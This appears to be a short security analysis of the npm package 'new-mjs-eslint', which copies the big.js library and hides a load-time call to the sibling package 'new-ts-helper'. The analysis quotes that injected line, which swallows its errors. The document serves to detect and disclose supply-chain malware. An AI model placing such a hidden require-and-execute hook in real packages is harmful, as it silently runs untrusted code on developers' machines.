Package is published under the unrelated name 'new-mjs-eslint' but ships a verbatim copy of the big.js decimal-arithmetic library (original MikeMcl/big.js header, README, and source). Both main entrypoints, big.js and big.mjs, contain an injected line at lines 605-606: const helper = require("new-ts-helper"); helper.from_str().then(e => e).catch(e => { });. This fires on every require()/import of the package, loads the sibling dependency new-ts-helper, invokes its from_str() function, and silently swallows any error. The package name does not match its advertised content (eslint-shaped name, big.js content), the injected call sits mid-file rather than at a natural import location, and errors are deliberately suppressed — the entrypoint is a delivery vector for whatever code new-ts-helper ships, executed at load time on any installer that imports the package.